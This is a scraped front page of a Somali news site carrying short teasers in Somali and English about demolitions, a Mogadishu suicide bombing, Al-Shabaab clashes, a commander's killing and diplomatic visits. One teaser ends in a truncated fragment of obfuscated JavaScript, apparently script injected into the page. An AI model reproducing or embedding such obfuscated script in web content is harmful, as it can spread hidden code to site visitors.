Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Howlgal Bur Burin ah oo ka Socda Wadada Xiriirisa Ex-Kontarool Afgooye iyo Muqdisho

MUQDISHO, Soomaaliya - Wararka naga soo gaaraya wadada xiriirisa Ex-Kontarool Afgooye iyo Muqdisho ayaa sheegaya in laamigan dheer uu ka socdo howlgal bur burin ah oo lagu bur burinayo guryaha iyo dukaamada ku yaalla wadadaas.   Howlgalkan ayaa si gaar ah looga fulinayaa aagga dhulkii hore ee daawada loo yaqaan. Mid ka mid ah dadka shacab ka ah, oo goob-jooge ka ahaa...

UN scales back aid goals in Somalia and Yemen

UNITED NATIONS, United States: The United Nations announced Friday it is scaling back its humanitarian aid goals in Yemen and Somalia in the latest fallout from a drastic drop in funding from member states.   It said the cuts are putting millions of lives at risk around the world. In January the UN launched an appeal for $2.4 billion to help 10.5...

Deadly Bombing Hits Military Recruitment Center in Mogadishu

MOGADISHU, Somalia – A large explosion, believed to be a suicide bombing, has struck the capital city of Mogadishu at a time when the overall security situation had been showing signs of improvement.   Reports indicate that the blast targeted a military recruitment center in the Dhamanyo area, where new soldiers were being enlisted. Preliminary information suggests that several people may have...

DEG DEG: Qarax ka dhacay magaaladda Muqdisho

MUQDISHO, Soomaaliya - Qarax wayn oo loo malaynayo ismiidaamin ayaa ka dhacay magaaladda Muqdisho, ee Caasimadda dalka Soomaaliya xili amniga soo hagaagayay.   Waxaa lagu soo waramayaa in qaraxa lala eegtay goob askar lagu qorayay, oo ku taalla Damaanyo, iyadoo wararka soo baxaya ay sheegayaan inay dhowr qof ku geeriyootay. Goordhaw filo Fahfaahinta warkan iyo muuqaallada. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const...

Clashes in Nuurdugle, Middle Shabelle as Somali Forces Repel Al-Shabaab Attack

Nuurdugle, Middle Shabelle – A fierce battle erupted overnight in the Nuurdugle area of the Middle Shabelle region, as Al-Shabaab militants launched a heavy assault on the town.   The heavy clash saw intense fighting between the insurgents and Somali National Army (SNA) forces, who were supported by local militia fighters from the area. While the exact toll of casualties remains unclear,...

Dagaal Xoogan oo ka Dhacay Deegaanka Nuurdugle ee Gobolka Shabeellaha Dhexe

JOWHAR, Soomaaliya - Faafaahin ayaa kasoo baxaysa dagaal xooggan oo ka dhacay deegaanka Nuurdugle ee gobolka Shabeellaha Dhexe saacadahii lasoo dhaafay.   Al-Shabaab ayaa xalay weerar xooggan ku qaaday deegaankaasi, waxaana halkaasi ka dhacay dagaal qaraar oo ay lagaleen ciidamada xoogga dalka oo garab ka helaya macaawislayda deegaanka. Dagaalka ayaa sababay qasaare kala duwan oo soo gaaray labada dhinac, hase yeeshee tirada...

Somali Army Brigadier General Killed in Frontline Shooting

Moqokori, Hiiraan Region – Somali Army’s 26th Brigade Commander, Brigadier General Abdirahman Hujale, was shot and killed on Saturday on the frontlines near Moqokori, in the Hiiraan region.   The shooting was carried out by a soldier named Abdullahi Hassan Ahmed, who was subsequently gunned down by fellow troops at the scene, according to security officials. The bodies of both the commander...

Taliyihii Guutada 26aad ee Ciidanka Xoogga Dalka oo Lagu Dilay Gobolka Hiiraan

MOQOKORI - Taliyaha guutada 26aad ee ciidanka xoogga dalka Soomaaliyeed, Kornayl Cabdiraxmaan Hujaale, ayaa lagu dilay maanta jiidda hore ee dagaalka ee deegaanada ku dhaw degmada Moqokori, ee gobolka Hiiraan.   Dilka Kornaylka waxaa geystay askari lagu magacaabo Cabdullaahi Xasan Axmed, kaasoo isna isla markiiba lagu toogtay goobtaas ayadoo ay dileen ciidamo kale oo halkaas ku sugnaa, sida ay saraakiisha amniga...

Madaxweynaha oo Taageeray Qadiyadda Falastiin, Soo Dhaweeyay Qaadista Cunaqabataynta Syria

BAQDAAD, 17 May – Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, ayaa Jimcihii ka qeyb galay shir-madaxeedka 34aad ee Jaamacadda Carabta oo ka furmay  magaalada Baqdaad ee caasimadda Ciraaq, halkaas oo uu ka sheegay in loo baahan yahay in la dhiso dowlad Falastiini ah oo madax-bannaan, isla markaana uu soo dhaweeyay in laga qaado cunaqabataynta caalamiga ah ee saarnayd dalka Suuriya.   "Gumeysi dambe...

Ugandan deputy military commander arrives in Mogadishu, Somalia

MOGADISHU, Somalia – The Commander of the Somali National Army’s Land Forces, Major General Sahal Abdullahi Omar, warmly received the Deputy Commander of the Uganda People's Defence Forces (UPDF), Lieutenant General Sam Okiding, at Mogadishu’s Aden Adde International Airport on an official visit to Somalia.   The visit marks a renewed push to enhance military cooperation and operational coordination between Somalia...

WARAR KALE

Wasiirka Warfaafinta oo Daah furay Dib u habeyn Lagu Sameeyay Kaydka Radio Muqdisho

MUQDISHO - Wasiirka Warfaafinta, Dhaqanka iyo Dalxiiska ee Xukuumadda Federaalka Soomaaliya, Mudane Cabdulfataax Qaasim Maxamuud, ayaa maanta furay dib-u habeyn yo dayactir lagu sameynayay...

Soomaaliya oo Ka Qaybgalay Shir Caalami ah oo ka Dhacay Washington DC

WASHIGTON - Agaasimaha Guud ee Wasaaradda Maaliyadda Xukuumadda Federaalka Soomaaliya, Dr. Suleyman Sheekh Cumar ayaa magaalada Washington DC uga qayb galay shir caalami ah...

Somalia Regrets World Cup Absence of Referee Omar Artan After U.S. Entry Setback

MOGADISHU — Somalia's Ministry of Youth and Sports on Tuesday expressed deep regret over the circumstances that prevented internationally recognized Somali referee Omar Abdulkadir...